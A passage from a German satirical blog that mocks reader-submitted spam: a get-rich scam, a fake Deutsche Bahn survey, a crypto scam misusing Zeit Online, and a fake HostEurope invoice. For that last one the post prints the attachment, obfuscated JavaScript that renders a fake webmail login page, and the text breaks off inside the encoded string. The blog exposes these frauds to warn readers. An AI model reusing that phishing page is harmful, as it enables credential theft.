Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Kategoriearchiv „Leserpost“

Empfehlung

Montag, 20. Juni 2022

Ich empfehle das Löschen. 🗑️

ACHTUNG! AUFGEPASST! Anonymer Bankmitarbeiter hat streng geheime Strategien veröffentlicht!

Was für Strategien? 🤔️

Junger Genie knackt ein Bankencode und zeigt ihn der ganzen Welt!

Neue Grammatik-Strategien vielleicht? 🤭️

Banken verdienen mit Kundengelder (wie von Ihnen) viele Millionen am Tag! Wir bekommen aber nur 0,3-3,5% Zinsen! Doch eigentlich sollten wir das pro Tag bekommen!

Banken verdienen mit Darlehen, also mit Geld, das sie teurer verleihen, als sie es aus anderen Quellen bekommen. Und wir sollten pro Tag jeder den Gesamtertrag einer Bank mit einigen hunderttausend bis Millionen Kunden bekommen, weil… ja, weil eigentlich! 😁️

Wirtschaftsstudent und Börsenliebhaber aus Frankfurt hat das Geheimnis gelüftet. Jetzt verdient er mit dieser Strategie vollautomatisch 13000 Euro am Tag! Und das mit nur maximal 5 Stunden Arbeitseinsatz pro Woche!

Ein Student mit einer komischen sexuellen Präferenz hat jetzt ein ganz geheimes Geheimgeheimnis gelüftet, mit dem er sich jedes Jahr 4,7 Megaeuro aus der Steckdose zieht, obwohl er nur höchstens eine Stunde am Tag dafür „arbeitet“. Das ist aber so dermaßen uninteressant, dieses Geheimnis, dass man es nur aus seiner Spam erfährt. 🤭️

Er hat das System geändert und ein Patent angemeldet! Jetzt gibt es das System an 200 Menschen weiter!

>>HIER GEHT ES ZUM VIDEO<<

Er hat sogar ein Patent angemeldet. Die Patentnummer erfahren wir leider nicht, sonst könnte man das mal nachlesen. Aber wer lesen will, ist eh nicht die Zielgruppe dieses Betruges. Stattdessen gibt es glotzi-glotzi Video. Dafür muss man sich nicht mit diesen Buchstaben rumschlagen. 📺️

Jetzt haben Sie diese Chance, es kostenfrei zu nutzen und vollautomatisch damit Geld zu verdienen!

Jetzt haben wir die Chance, auf einen Link in einer Spam zu klicken, die offen wie eine Postkarte durch das Internet befördert wurde, um in einem Video auf einer offenen, für die ganze Welt lesbaren Website das ganz geheime Geheimnis zu erfahren, wie man sich Geld aus der Steckdose zieht. 🔌️💰️

Völlig „kostenfrei“, versteht sich. Bis auf die paar hundert Euro, die man auf einer komischen Website in irgendwelche digitalen Tulpen „investiert“. Da werden einem dann Zahlen auf einer Website oder in einer App angezeigt, und wenn man glaubt, dass diese Zahlen Geld sind, freut man sich sogar darüber, dass man immer reicher wird und legt dafür auch mal ein paar zehntausend Euro nach, damit man noch reicher wird. Darlehen sind im Moment ja preiswert. Und der Betrü… ähm… Support-Mitarbeiter am Telefon ist echt verständnisvoll und kennt sich aus. Der lebt davon, dass man immer mehr Geld nachschießt. So fühlt sich das Opfer dieser Betrüger reicher und reicher und reicher. Ganz viel gefühlter Reichtum. Bis es sein „Geld“ abholen will. 💸️

Laut Pressebericht hat er schon über 2000 Kaufangebote von bis zu 100 Millionen Dollar bekommen.

Das steht sogar schon in den Zeitungen. Leider erfahre ich nicht, wo dieser „Pressebericht“ veröffentlicht wurde. Woran das wohl liegt? 🤥️

Banken werden jetzt alles dafür tun, damit Sie diese Software nicht testen! Negativmarketing, Sperrungen etc. Hauptsache die Menschcheit bekommt nicht mit, wie leicht und schnell Banken mit unserem Geld ein Vermögen verdienen!

>>HIER GEHT ES ZUM VIDEO<<

Seltsam, ich bekomme jetzt seit dem 5. September 2017, also seit 1749 Tagen, Spams, in denen mir gesagt wird, dass ich vollautomatisch durch Handel mit digitalen Tulpen reich werde. Davor habe ich Spams bekommen, dass ich vollautomatisch durch Börsenhandel mit hochspekulativen Wettzetteln reich werde. Und davor habe ich Spams bekommen, dass ich spielerisch mit Roulettesystemen reich werde. Alle diese Spams haben mir versprochen, dass ich mir jede Menge Geld aus der Steckdose ziehen kann. Eines habe ich in den ganzen Jahren nie erlebt: Dass irgendeine Bank da Negativmarketing gemacht hätte. 🤡️

Nutzen Sie jetzt die Chance und nutzen Sie schnell die Software, bevor eine Bank dieses Patent aufkauft! Wenn Sie jetzt noch eine kostenfreie Lizenz bekommen, dann dürfen Sie diese Software ein Leben lang kostenfrei nutzen!

Warum sollte eine Bank das Patent aufkaufen können? Es ist immer noch niemand zum Verkaufen gezwungen, und schon gar nicht, wenn er sich sowieso unbegrenzt Geld aus der Steckdose ziehen kann. 🔌️💰️

Wenn ich für jeden inneren Widerspruch aus den betrügerischen Drecksspams der Reichwerdexperten fünf Euro bekommen hätte, dann läge jetzt auch eine ganz ansehnliche Patte Geld vor mir. 💶️

Wird es aber in den nächsten Stunden verkauft, so sind Sie zu spät! Diese Chance gibt es alle 50 Jahre!

Was meinst du Hirnruine? Die Chance, zu spät zu sein? 😂️

Ein Notar hat es mit einem Rechtsanwalt getestet!
Ergebnis: 20 von 20 Tests waren erfolgreich
Kommentar: „Software funktioniert einwandfrei und ist 100% legal“

Das ist aber schön, dass es nicht nur zu zweiundsiebzig, fünfundachtzig, oder lediglich einundneunzig, sondern zu runden und in die kotige Trübnis des Spamfilters leuchtenden hundert Prozent legal ist. 💯️

Wie sähe eigentlich etwas aus, was nur zu siebzig Prozent legal wäre? Das soll mir mal dieser namenlose Rechtsanwalt zusammen mit diesem namenlosen Notar erklären. Ich lache doch gern. 😂️

10 Tage lang liefen die Tests. Ergebnis war ein Verdienst von 50.998,10 Euro

Das ist ja leicht zu rechen, das macht rd. 5.100 € am Tag. Weiter oben in der gleichen Spam wurden mir aber noch 13.000 € pro Tag als mögicher Verdienst angepriesen. Aber wie ich schon sagte: Wenn ich nur für jeden inneren Widerspruch in einer typischen Reichwerdspam fünf Euro bekommen hätte… 😎️

Wer trotz des kirren Wahnsinns unserer Zeit noch ein funktionierendes Kurzzeitgedächtnis hat und bei der Erwähnung von Zahlen nicht von heiligem und unverständigem Respekt durchgeschüttelt wird, sondern im Zweifelsfall Überschlagsrechnungen macht oder sogar zum Taschenrechner greift, ist ja auch nicht die Zielgruppe dieser Spams. Zielgruppe sind Menschen…

>>HIER GEHT ES ZUM VIDEO<<

…die sich erst so richtig zum Klicken aufgefordert fühlen, wenn man ihnen in jedem Link sagt, dass sie da auch nichts zu lesen bekommen. 📺️

ACHTUNG: Sollte diese Seite momentan nicht erreichbar sein, dann haben wir diese auf Grund der hohen Nachfrage für eine kurze Zeit offline genommen.
Bitte probieren Sie es dann einfach in 15 Minuten nochmals

Achtung: Sollte man klicki-klicki machen, aber es gibt dort gar kein glotzi-glotzi mehr, dann hat der Hoster der Website den Stecker gezogen, weil er keine Lust hatte, an Verbrechen beteiligt zu sein. Das passiert immer wieder mal. Einfach ein Viertelstündchen warten, dann sind die gewerbsmäßigen Betrüger mit ihrer Reichwerdspam schon zu einem neuen Hoster umgezogen. 🤭️

Newsletter abmelden hier klicken

Vor meinem Arsch ist auch kein Gitter! 👅️

kteacvfltomnunphzrzyiyzdjhjxegqowjuuoldioxfmlyuemrhekqoqjzwovhnnnzcewxampay

Es gibt ja doch noch ein Geheimnis. Nämlich das Geheimnis, wie die Spammer so eine tolle, kryptisch aussehende Zeichenkette unter ihre Spam fummeln. Das muss echt aufwändig sein.

$ perl -e 'for $i(1..30){printf("%c%s",97+rand(26),$i==30?"\n":"");}'
fuzlpujetibokbmyectonsctfvfrxi
$ _

Oder auch nicht.

Interessant ist übrigens auch, was man in dieser ganzen Spam nicht erfährt: Wie man jetzt hokus pokus internet reich werden soll? 🔍️

Aber wer sich vor seinem Klick für solche Details interessiert, ist vermutlich schon eine Spur zu intelligent für diesen Betrug. 💡️

Diese Spam aus dem alltäglichen Wahnsinn des Posteinganges ist ein Zustecksel meines Lesers A. H.

Glückwünsche ! Sie wurden von Bahn Rewards ausgewählt

Dienstag, 7. Juni 2022

Das glaube ich kaum. „Bahn Rewards“ kennt mich nicht. Woher denn auch? Und diese Spam kommt gerantiert nicht von der Deutschen Bahn. Sie hat niemals einen Server der Deutschen Bahn gesehen. Also nicht darauf reinfallen! Alle Daten, die man dort eingibt, gehen an Kriminelle. ⚠️

Tickets Sicher reisen Icon Login

Na, Spammer, da sollten doch sicherlich noch Links rein, oder? Aber man kann ja auch nicht immer an alles denken. 🤭️

Digitale Abos immer griffbereit

Oh, du hast ja schon wieder einen Link vergessen, Spammer. Und dabei hast du so ein schönes Bild mit Klickeknöpfchen in deine Spam gemacht. Na ja, du kannst ja auch nicht immer Glück beim Denken haben. Komm, ich gebe dir dafür ein Fleißbienchen. 🐝️

Sehr geehrte Damen und Herren,

Genau mein Name! 👍️

500 glückliche Kunden wurden ausgewählt, um an unseren schnellen und einfachen Frageumfragen teilzunehmen,

Und wenn ich kein glücklicher Kunde bin? Das ist schon scheiße, wenn man überzeugend spammen will, einem aber das Sprachgefühl viel zu hastig verabreicht wurde. 😁️

Und die „schnellen und einfachen Frageumfragen“ sind auch eher so minderüberzeugend in der Wortwahl. 😂️

im Gegenzug erhalten Sie 55 Euro, Bahn.de verpflichtet sich, seinen Kunden den besten Service und die beste Qualität zu bieten. Im Einklang mit unserer Verpflichtung zur kontinuierlichen Verbesserung möchten wir unsere aktuelle Leistung in Bezug auf eine breite Palette von Themen untersuchen, die für unseren Erfolg entscheidend sind.

Aha, dafür, dass ich ein paar blöde Fragen beantworte, soll ich also 55 Euro kriegen. Jetzt verstehe ich endlich, warum die ganzen Milliarden Euro, die von der BRD in die Deutsche Bahn gesteckt werden, immer so versickern, ohne dass sich für die Nutzer der Deutschen Bahn etwas verbessert (wenn man mal von sinnlos aufgehübschten Großstadtbahnhöfen absieht): Weil die Deutsche Bahn solche teuren Umfragen macht. Und diese angebliche „Selbstverpflichtung“ ist einfach nur obergeil! Jeder, der schon einmal die Deutsche Bahn als „Beförderungsfall“ benutzt hat oder – viel häufiger – benutzen musste, weiß, dass es dort eines ganz sicher nicht gibt: Ein aktives Bemühen um guten Service. Das fängt schon mit den Fahrkartenverkaufsautomaten an, und es hört bei Mitarbeitern, die das überkomplizierte und für Normalsterbliche undurchsteigbare Tarifsystem der Deutschen Bahn nicht kennen, obwohl sie jeden verdammten Arbeitstag acht Stunden lang Fahrkarten verkaufen, noch lange nicht auf. Von der technischen Umsetzung des Bahnverkehrs möchte ich gar nicht erst anfangen. Nur eine kleine Anekdote: In Hannover gibt es einen ziemlich wichtigen Umsteigebahnhof für Norddeutschland, und da hing immer schon eine große Tafel, auf der die nächsten ankommenden und abfahrenden Züge aufgelistet werden. Früher, als man die Bahn noch benutzen konnte, standen da relativ selten Hinweise auf kleine Verspätungen und normalerweise (natürlich gabs auch früher fiese Unwetter, nach denen die Schienen erstmal wieder freigeräumt werden mussten) keine Hinweise auf Zugausfälle. Heute ist das eher andersherum, man sieht kaum noch das Fehlen solcher Hinweise, weil es zur Abwechslung einmal normalen, fahrplangemäßen Zugbetrieb gäbe. Und das, obwohl Verspätungen unter einer Viertelstunde schon gar nicht mehr angezeigt werden, damit es wenigstens ein bisschen weniger schlimm aussieht. ☹️

Hach! Das waren noch Zeiten, als „pünktlich wie die Eisenbahn“ ein Kompliment war. Heute hat der Schienenverkehr bei der Deutschen Bananenbahn im Wesentlichen vier große Gegner, gegen die er ständig verliert: Frühling, Sommer, Herbst, Winter. ⛅️

Und der fünfte große Gegner – zumindest wird er durch und durch wie ein solcher behandelt – ist der Beförderungsfall, der die Züge der Deutschen Bananenbahn nutzen will oder muss. Und die machen jetzt angeblich auf „Service“? Mit angeblicher „Selbstverpflichtung“? Damit so eine Dummfrage… ähm… Umfrage besser aussieht? Guter Witz! 😂️

Aber dafür ist das Bahnfahren in Deutschland zum Ausgleich unbezahlbar teuer geworden. Hier in Hannover hängen zurzeit überall Werbeplakate, dass ich für 39 € nach Madeira fliegen kann. Das scheint rentabel für den Anbieter zu sein. Er macht sogar massiv Reklame dafür, damit dieses Angebot auch ja mehr genutzt wird, so dass er noch mehr Reibach machen kann. Viel Reklame. Und jedesmal, wenn ich an einer solchen Reklamepappe vorbeigehe, frage ich mich, wie weit man wohl mit 39 € im ICE kommt. Madeira ist übrigens etwas über 3.000 Kilometer von Hannover entfernt und liegt angenehm viel näher am Äquator… 😡️

Ach, ich schreibe ja gar nicht über die Deutsche Bahn, sondern über eine Spam. Na gut, also weiter:

Mehr erfahren

Wer da klickt, lasse alle Hoffnung fahren! Der Link geht natürlich nicht in die Domain der Deutschen Bahn, sondern in die viel weniger Vertrauen erweckende Domain studie (bindestrich) hulp (punkt) com. Nein, ich weiß nicht, wer „Hulp“ ist, aber er…

$ host studie-hulp.com
studie-hulp.com has address 50.87.186.52
studie-hulp.com mail is handled by 0 mail.studie-hulp.com.
$ country 50.87.186.52
50.87.186.52 is from United States of America (US) 
$ _

…wohnt nicht in Deutschland. Und alle Daten, die man dort eingibt, um in den angeblichen Genuss von 55 € zu kommen, gehen direkt an spammende Kriminelle. Zum Glück hat der Hoster diese Betrügerseite schon längst entfernt. Aber ich bin mir sicher, dass die gleichen Spams demnächst mit einem Link auf eine andere Betrügerseite versendet werden. 😟️

Eine angenehme Reise wünscht Ihnen
Ihr bahn.d‌e-Team

Wie schon gesagt, diese Spam hat nichts mit der Deutschen Bahn zu tun. 🤥️

Dear Customer,

500 lucky customer have been selected to participate in our quick and easy question surveys,

in return you will receive a 55 Euro , Bahn.de is committed to providing its customers with the best service and quality. In line with our commitment to continuous improvement, we are looking to examine our current performance across a broad range of issues critical to our success.

Claim Bahn.de rewards now: Take the survey

Eine angenehme Reise wünscht Ihnen
Ihr bahn.d‌e-Team

So schade, dass die angebliche Werbeabteilung der Deutschen Bahn keine englischen Abschlussformeln für einen Brief oder eine Mail kennt. 🤭️

So, und jetzt gibt es noch mal ein bisschen was zum Lachen:

Hilfreiche Links

Meine Bahn →

Ist mein Zug pünktlich? →

Hilfe & Kontakt →

Services am Bahnhof →

Deutsche Bahn interaktiv.

Reden Sie mit.

Facebook Instagram Twitter YouTube

DB Inside Bahn →

DB Service-Community →

Entdecken Sie den DB Navigator

Laden im App Store Jetzt bei Google Play

Jetzt in der AppGallery

Das Apple Logo und App Store sind Marken der Apple Inc., die in den USA und anderen Ländern registriert sind. Google Play und das Google Play-Logo sind Marken von Google LLC. Huawei Logo und AppGallery sind Marken oder eingetragene Marken von Huawei Technologies Co., Ltd.

„Hilfreiche Links“, die gar nicht mit irgendwas verlinkt sind, wären so typisch für die Deutsche Bananenbahn, dass es fast schon wieder gut ist. Aber hier haben wir es mit der Unfähigkeit und Dummheit der Hirnruine eines Spammers zu tun, nicht mit der Deutschen Bahn. 🤣️

Service

Diese E-Mail wurde an test@example.com gesendet. Sie erhalten diese, da Sie uns Ihre Zustimmung erteilt haben.

Kontaktformular

Newsletter abbestellen

Datenschutzhinweise einsehen

Dies ist eine automatische E-Mail. Bitte antworten Sie nicht direkt darauf.

Na, immerhin kann man noch mit einem Klick mitteilen, dass die Spam angekommen ist, gelesen wurde und beklickt wurde, wenn man nicht noch mehr von diesem Bullshit haben möchte. Deshalb soll man ja auch nicht antworten, denn die Absenderadresse ist ja gefälscht. 🤥️

Impressum

DB Vertrieb GmbH | Euro‌pa-All‌ee 78‌-84‌ | 60‌486 Fr‌ankfurt am Main | E-Mail: reiseportal‌@bahn‌.‌de | Geschäftsführer: Georg Lauber (Vorsitzender), Nils Hartgen, Thomas Hermann, Carmen Maria Parrino | Vorsitzender des Aufsichtsrates: Berthold Huber | Registergericht: Frankfurt am Main | HRB 79‌808 | USt.-Id.-Nr.: DE 814‌160‌246

Wie schon gesagt: Die Deutsche Bahn hat mit diesen Spams gar nichts zu tun. Es sind Spams.

bahn.d‌e – Ihr Mobilitätsportal DB Logo

Entf! 🗑️

Diese Spam aus dem täglichen Irrenhaus des Posteinganges ist ein Zustecksel meines Lesers A. H.

Investieren Sie in Krypto und verdienen Sie 7000€ jeden Tag ����k����

Montag, 2. Mai 2022

Spammen sie für Kryptogeldbetrug und sie brauchen sich nicht einmal mehr Gedanken über das Encoding des Betreffs ihrer Spammail machen. Ideal für Menschen, die das mit dem Gedankenmachen eh nicht so mögen. 💩️

Die Spam verzichtet auf Text und breitet ihre Botschaft komplett in einem Bild aus, das aus dem Web nachgeladen wird. Menschen mit einer sicher konfigurierten Mailsoftware sehen hier also außer der Möglichkeit, sich von unbestellten Mülllieferungen ohne Inhalt abzumelden, gar nichts von der beabsichtigen Botschaft. Oder anders gesagt: Wer sicher konfigurierte Software benutzt, ist für den Betrug dieser Betrüger schon viel zu schlau. 💡️

Natürlich wird der Webserver, auf dem das Bild liegt…

$ whois tildacdn.com | grep -i ^registrant | sed 8q
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
$ _

…über einen Dienstleister aus dem staubigen Arizona¹ völlig anonym betrieben, denn es ist ja doch ein bisschen unangenehm, wenn man vom Betrug leben möchte und dann kommt auf einmal diese Polizei vorbei und legt einem diese lästigen Handschellen an. Vermutlich sind die persönlichen Daten, die diese Verbrecher gegenüber dem Anonymisierungs-Dienstleister angegeben haben, von einem ihrer früheren Opfer mitgenommen. Das ist ärgerlich für das frühere Opfer des Betrugs, aber das ist eben auch der Grund, weshalb man kriminellen Spammern niemals persönliche Daten gibt. Auch nicht, wenn sie mit Geld, Geschenken und riesigen Vorteilen winken. 🎣️

Sie lügen. 🤥️

Und sie sind wirklich widerlich. 🤮️

So, nun zur Spam, die fast keinen Text enthält:

Zeit Online -- Sonderbericht: Friedrich Merz jüngste Investition lässt Experten und Grossbanken erschrecken -- Letzte Woche trat er mit Markus Lanz auf und kündigte ein neues 'Vermögens-Schlupfloch' an, von dem er sagt, es könne jeden innerhalb von 3-4 Monaten in einen Millionär verwandeln. Friedrich Merz forderte jeden in Deutschland auf, diese erstaunliche Gelegenheit zu nutzen, bevor die großen Banken sie für immer schließen -- [Read More] -- Vielleicht haben sie von dieser neuen Krypto-Währungs-Investitionsplattform namens Bitcoin Revolution gehört, die normalen Menschen in Deutschland, Asien und Nordamerika hilft, über Nacht ein Vermögen aufzubauen. Vielleicht sind Sie skeptisch, weil es zu gut klingt, um wahr zu sein. ??? -- Ich verstehe das, weil ich das Gleiche dachte, als mir ein vertrauter Freund davon erzählte. Aber nachdem ich mit eigenen Augen gesehen hatte, wie viel Geld er verdiente, musste ich es selbst ausprobieren. -- Wir erleben harte wirtschaftliche Zeiten, und dies ist die Lösung, auf die die Menschen gewartet haben. Noch nie in der Geschichte hatten wir eine so erstaunliche Gelegenheit, die die einfachen Menschen so leicht nutzen können, um in so kurzer Zeit so enormen Wohlstand zu schaffen. -- [Read More]

abmelden

Für Genießer habe ich das Bild auch in Originalgröße. Der überlagerte Schriftzug „SPAM“ ist natürlich von mir, denn ich werde nicht so gern Bildhoster für Kriminelle. 😉️

Es ist leicht, zu bemerkeln, dass dieser Text trotz des vorsätzlich irreführenden Logos nicht aus diesem Internet-Fischblatt „Zeit Online“ kommt. Zwar gibt es dort seit langer Zeit kein Lektorat mehr, und das merkt man leider immer wieder, wenn man den Ausfluss aus dieser Redaktion „genießt“, aber derartige Rechtschreibfehler (kein Apostroph nach dem Namen Merz im Genitiv, „Grossbanken“, mehrfach wiederholte Satzzeichen), dieses Abgleiten in „Read More“ für den Text auf dem Klickeknopf und die allgemeine sprachliche Unbeholfenheit auf mäßig fortgeschrittenem infantilen Level (erschreckende Banken, normale Menschen, harte wirtschaftliche Zeiten, enormer Wohlstand, geschichtliche Dimension einer angeblichen Geldanlage) liegt weit unterhalb des sprachlichen Niveaus der Zeit und wäre in dieser Form und Häufung nicht einmal in der Bildzeitung durchgegangen. Ja, dieser Text wäre der Mehrheit der Werbetexter vermutlich zu plump und trashig. 💩️

Und wenn man erstmal gemerkt hat, dass das Zeit-Online-Logo über diesem Text eine Lüge ist, dann wird schnell klar, dass alles in diesem Text eine Lüge ist. 🤥️

Natürlich funktionieren die Bitcoin-Reichwerdmethoden nicht. Wenn Bitcoin gehandelt wird, ist das ein Markt. Dort entsteht ein Preis für eine Ware. Dort entsteht kein Geld. Geld wird auf einem Markt „nur“ umverteilt, das heißt, nach einem Handel hat jemand mehr Geld und jemand hat weniger Geld. Wenn durch Bitcoin-Handel angeblich in einem Vierteljahr jeder in einen Millionär verwandelt wird (und es sich nicht um Zimbabwe-Dollar aus der Hyperinflation handelt), stellt sich schon die Frage, wo wohl die achtzig Billiarden Euro für die Bevölkerung der Bundesrepublik Deutschland herkommen sollen, die dabei an die Bevölkerung umverteilt würden. Und natürlich die Frage, was dieses Geld dann wohl wert wäre – eine Klopapierkrise hätten wir jedenfalls nicht mehr zu befürchten, wenn man die bunten Läppchen der EZB auch noch etwas saugfähiger machte. 😁️

Zum Vergleich: Der Bundeshaushalt im fürchterlich teuren Corona-Jahr 2021 hat nach Angaben des Bundesfinanzministeriums rd. 547,7 Milliarden Euro betragen. Die hier versprochenen Gewinne durch Bitcoin-Handel sind, wenn jeder davon profitiert, mehr als 145mal so hoch. 😯️

Das einzige, was mich an dieser Spam erheitert, ist, dass die Spammer auf die Idee gekommen sind, dass jemand, der den CDU-Fraktions- und Parteivorsitzenden Friedrich Merz bei irgendwelchen Talkshow-Auftritten für vertrauenswürdig hält, wohl auch auf einen Betrug reinfallen könnte. 😂️

Übrigens: Ich weiß nicht, wie die verlinkte Website heute aussieht, denn diese Spam war ein Zustecksel eines Lesers und ich wollte deshalb nicht schauen, wo der Link mit personalisierter ID in der Adresse hinführt, aber damals, vor nicht ganz vier Jahren, wurde der Betrug „Bitcoin Revolution“ so wie in meinem Text vom 26. Oktober 2018 präsentiert. Reich geworden ist davon keiner. Außer den Betrügern und den Spammern, die sich von Betrügern Affiliate-Geld dafür auszahlen lassen, dass sie den Betrügern neue Opfer zutreiben. Ich wäre nicht überrascht, wenn die heute noch das selbe Design verwenden. Denn wenn Spammer sich Mühe geben wollten, dann könnten sie ja gleich arbeiten gehen. 🛠️

Diese Spam aus dem täglichen Klo des Posteinganges ist ein Zustecksel meines Lesers A. H.

¹Es kann völlig vernünftige Gründe geben, solche Dienstleister zu benutzen, ohne dass man kriminell ist. Zum Beispiel, weil man mit seiner persönlichen Website lieber nicht so zugreifbar für Stalker, Werber, Spammer, gewaltbereite politische und religiöse Extremisten und Idioten sein möchte. Bei kommerziellen Websites im Rechtsraum der EU, die einer gesetzlichen Impressumspflicht unterliegen, ist so ein Anonymisierungsschritt allerdings immer sinnlos, denn man kann sie sowieso nicht legal und anonym betreiben. Die Benutzung solcher Dienstleister ist hier immer ein klarer Hinweis auf kriminelle Absichten.

Ihre Rechnung, Rechnungs-Nr.137784 vom 25.04.2022

Freitag, 29. April 2022

Nein, diese Mail kommt nicht von HostEurope. Es ist Phishing. ⚠️

Hallo ,

Ein Komma. Genau mein Name! 👍️

Ihre aktuelle Rechnung für Ihre Kundennummer 137784 vom 25.04.2022 steht für Sie auf

Das ist ja schön, dass die Rechnung für mich aufsteht. 😂️

Der sofort fällige Gesamtbetrag von 20,97 EUR wird Ihrem Konto in Kürze belastet. Der ausgewiesene Rechnungsbetrag wird mit ggf. vorhandenem Guthaben verrechnet.

Aha. Ich habe gegebenenfalls vorhandenes Guthaben, das verrechnet wird. So schade, dass die Computer, die im Auftrag des Hosters HostEurope Rechnungsmails versenden, nicht zum Rechnen imstande sind und mir nicht den korrekten Rechnungsbetrag anzeigen können. Vielleicht sollte HostEurope sich mal Rechner kaufen, die auch rechnen können. Das würde vieles vereinfachen. 🤣️

Ihre Rechnung liegt im HTML-Format vor und kann mit einem Mozilla Firefox, Google Chrome, Internet Explorer.

Sie kann übrigens auch mit einem Pale Moon, LibreWolf, Opera oder sonstigen Webbrowser. Aber bitte nicht mit einem Lynx oder einem Desktop-Browser, der kein Javascript ausführt, denn diese HTML-Datei ist kein HTML-Dokument, sondern…

$ cat Rechnung-137784.html 
<!DOCTYPE html>
<html lang="en">
<script language="javascript">
document.write(unescape('%3C%68%65%61%64%3E%0A%20%20%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%55%54%46%2D%38%22%3E%0A%20%20%20%20%3C%74%69%74%6C%65%3E%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%20%3A%3A%20%57%65%6C%63%6F%6D%65%20%74%6F%20%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%3C%2F%74%69%74%6C%65%3E%0A%20%20%20%20%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%76%69%65%77%70%6F%72%74%22%20%63%6F%6E%74%65%6E%74%3D%22%77%69%64%74%68%3D%64%65%76%69%63%65%2D%77%69%64%74%68%2C%20%69%6E%69%74%69%61%6C%2D%73%63%61%6C%65%3D%31%2E%30%2C%20%73%68%72%69%6E%6B%2D%74%6F%2D%66%69%74%3D%6E%6F%2C%20%6D%61%78%69%6D%75%6D%2D%73%63%61%6C%65%3D%31%2E%30%22%3E%0A%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%63%73%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%63%73%73%22%3E%0A%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%63%73%73%2F%73%74%79%6C%65%73%2E%63%73%73%22%3E%0A%09%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%66%6F%6E%74%73%2F%66%61%2D%73%6F%6C%69%64%2D%39%30%30%2E%77%6F%66%66%22%3E%0A%20%20%20%20%3C%73%74%79%6C%65%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%20%20%20%20%09%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%67%65%6E%65%72%61%74%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%67%65%6E%65%72%61%74%65%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%79%65%73%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%79%65%73%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%73%75%62%6D%69%74%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%73%75%62%6D%69%74%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%63%6F%6E%74%69%6E%75%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%63%6F%6E%74%69%6E%75%65%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%73%61%76%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%73%61%76%65%3A%62%65%66%6F%72%65%20%7B%0A%20%20%20%20%63%6F%6E%74%65%6E%74%3A%20%6E%6F%6E%65%3B%0A%7D%0A%40%66%6F%6E%74%2D%66%61%63%65%20%7B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%27%46%6F%6E%74%41%77%65%73%6F%6D%65%2D%73%77%61%70%27%3B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%64%69%73%70%6C%61%79%3A%20%73%77%61%70%3B%0A%20%20%20%20%20%20%73%72%63%3A%20%6C%6F%63%61%6C%28%27%46%6F%6E%74%41%77%65%73%6F%6D%65%27%29%2C%20%75%72%6C%28%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%66%6F%6E%74%73%2F%66%61%2D%73%6F%6C%69%64%2D%39%30%30%2E%77%6F%66%66%32%29%20%66%6F%72%6D%61%74%28%27%77%6F%66%66%32%27%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20%3C%2F%73%74%79%6C%65%3E%0A%3C%2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%20%63%6C%61%73%73%3D%22%74%61%73%6B%2D%6C%6F%67%69%6E%20%61%63%74%69%6F%6E%2D%6E%6F%6E%65%22%3E%0A%20%20%20%20%3C%64%69%76%20%69%64%3D%22%6C%61%79%6F%75%74%22%3E%0A%20%20%20%20%20%20%20%20%3C%68%31%20%63%6C%61%73%73%3D%22%76%6F%69%63%65%22%3E%67%6C%6F%62%61%6C%70%6F%69%6E%74%2E%65%73%20%57%65%62%6D%61%69%6C%20%4C%6F%67%69%6E%3C%2F%68%31%3E%0A%20%20%20%20%20%20%20%20%3C%64%69%76%20%69%64%3D%22%6C%61%79%6F%75%74%2D%63%6F%6E%74%65%6E%74%22%20%63%6C%61%73%73%3D%22%73%65%6C%65%63%74%65%64%20%6E%6F%2D%6E%61%76%62%61%72%22%20%72%6F%6C%65%3D%22%6D%61%69%6E%22%3E%0A%20%20%2